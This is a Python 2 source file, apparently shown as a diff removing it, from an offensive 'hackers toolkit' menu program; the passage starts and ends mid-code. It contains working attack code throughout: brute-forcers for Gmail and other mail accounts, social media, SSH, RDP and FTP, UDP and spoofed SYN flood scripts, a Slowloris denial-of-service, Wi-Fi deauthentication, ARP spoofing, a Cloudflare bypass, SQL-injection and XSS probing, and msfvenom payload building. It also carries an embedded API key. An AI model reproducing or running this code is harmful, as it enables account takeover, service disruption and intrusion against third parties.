' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", 